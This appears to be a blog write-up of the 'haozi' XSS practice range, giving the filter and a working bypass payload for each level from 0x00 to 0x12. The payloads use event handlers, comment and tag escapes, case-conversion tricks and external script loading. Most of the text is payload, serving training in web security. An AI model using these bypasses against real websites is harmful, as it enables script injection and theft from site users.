当前位置:网站首页>XSS online shooting range---haozi
XSS online shooting range---haozi
2022-08-03 21:11:00 【hug kitten】
目录
Online shooting range
0x00
There are no restrictions on this level,直接<script>alert(1)<script>就过去了
0x01
This level is to put our input data into<textarea>标签里面了,但是<textarea>It cannot be executed in the labelJS代码,In addition, there are no other restrictions on symbols, etc,So let's close first<textarea>标签,在写入JS代码
</textarea><script>alert(1)</script>
PS:HTMLThe label has an automatic error correction function,So whether to add it or not<textarea>This code can be executed by closing the following tags
0x02
This level is to transmit our input data tovalue中,So we need to close the double quotes first,再执行JS代码
aa" οnclick="alert(1)
0x03
这一关对(、)、[ 、] 进行了限制,At this time, we can consider using backticks instead of parentheses to executeJS代码,在执行的JSThe code needs to be correct beforevalueDo double-quote closures
aa" <script>alert`1`</script>
0x04
这一关对(、)、[ 、] 、` 进行了限制,We can't try to get around it by encoding the parentheses after the backticks
aa" <img src=1 οnerrοr=alert(1)
0x05
This level will put the input into the comment,And the input comment characters are filtered,使用jsThe second annotation in :--!>
aa" --!> <img src=1 οnerrοr=alert(1) It can be bypassed without encoding
0x06
过滤了js中的点击事件,Execute the function after wrapping it on a new line
aa" type="image" src=1 onerror 需要换行
=alert(1)
0x07
过滤了JS中的script等标签,Special symbols like angle brackets are also filtered,htmlThe language is looser-->Incorrect syntax will be completed,Try without the closing tag,不行,Not a pair of angle brackets,所以我们使用<img标签
<img src=1 οnerrοr=alert(1) A newline is required at the end
0x08
The entered content is put in<stype>标签中,<stype>标签中的内容不执行JS,Closure is achieved with a newline<stype>,Newlines also bypass regular expressions
</style Be sure to wrap the line when the label is not closed
><img src=1 οnerrοr=alert(1)
0x09
Regular expressions restrict what must be preceded by http开头,The front label can be closed,Bypass in the middle,并使用//注释后面的内容.
http://www.segmentfault.com"></script><script>alert(1)//
0x0A
URL格式:@The previous website can be redirected to the following website.所以我们可以先创建一个JS脚本,Then redirect the site to what we wrote ourselvesJS脚本
http://[email protected]/test.js
0x0B
toUpperCase() 方法用于把字符串转换为大写. This question converts our input to uppercase,
利用 <img src=1 οnerrοr=实体编码> 或 <svg/οnlοad=实体编码> 实现绕过
<img src=1 οnerrοr=alert(1)>
<svg/οnlοad=alert(1)>
0x0C
Uppercase and lowercase the entered data,且过滤script,可以使用<svg/οnlοad=实体编码绕过> 或<details open οntοggle=实体编码>绕过
<svg/οnlοad=alert(1)>
<details open οntοggle=alert(1)>
0x0D
This level is filtered/[</"']符号,And put the input into the comment,We need to escape the comment with a newline first,After writing the popup function, you need to wrap the line and comment out the following symbols.
#换了一行
alert(1)
--> #Comment out the following single quotes and parentheses
0x0E
This level restricts letters starting with angle brackets and capitalizes letters,In this case we can use a special symbol ſ --> Uppercase characters are converted to S,实现绕过
<ſvg/οnlοad=alert(1)>
<ſcript src="http://127.0.0.1/test.js"></ſcript> #We do this by introducing our ownJS文件实现绕过
0x0F
This level escapes many symbols,But it can be directly identified,So such encoding restrictions don't have much effect,We only need to comment out the following characters in the previous closed pop-up window.
bbb');alert(1)//
0x10
window.data就是一个全局变量,直接写alert相当于将alert传输到window.data
0x11
与F关 很类似,Close the front directly,Just comment after it
aa");alert(1)//
0x12
This level is related to11关相似,But replace the double quotes with \\ ,我们需要加上\ 进行转义
aa\");alert(1)//
边栏推荐
- leetcode 231. Powers of 2
- idea2021.1.3版本如何启动多个客户端程序
- dataframe 多层索引 更换索引 df.swaplevel(axis=1)
- C. Divan and bitwise operations
- nvm的使用 nodejs版本管理,解决用户名是汉字的问题
- MMA安装及使用优化
- 在树莓派上搭建属于自己的网页(3)
- C. Fishingprince Plays With Array--Codeforces Global Round 21
- Power button 206 - reverse list - the list
- 15年软件架构师经验总结:在ML领域,初学者踩过的五个坑
猜你喜欢
随机推荐
2022年强网杯rcefile wp
LeetCode_Digit Statistics_Medium_400. Nth Digit
模板字符串
Advantages and Disadvantages of Blind and Buried Via PCB Stacked Via Design
Power button 206 - reverse list - the list
函数,递归以及dom简单操作
6. XML
一体化HTAP数据库如此难,为什么他们还要做?
《QDebug 2022年7月》
error: C1083: 无法打开包括文件: “QString”: No such error: ‘QDir‘ file not found
系统运维系列 之CSV文件读取时内容中包含逗号的处理方法
What is the role and difference between buildscript and allprojects?
迪赛智慧数——柱状图(多色柱状图):2021年我国城市住户存款排名
15年软件架构师经验总结:在ML领域,初学者踩过的五个坑
3种圆形按钮悬浮和点击事件
NAACL 2022 | 具有元重加权的鲁棒自增强命名实体识别技术
461. 汉明距离
2022/08/03 学习笔记 (day23)多线程(补充)
AWTK开发编译环境踩坑记录1(编译提示powershell.exe出错)
伪标签汇总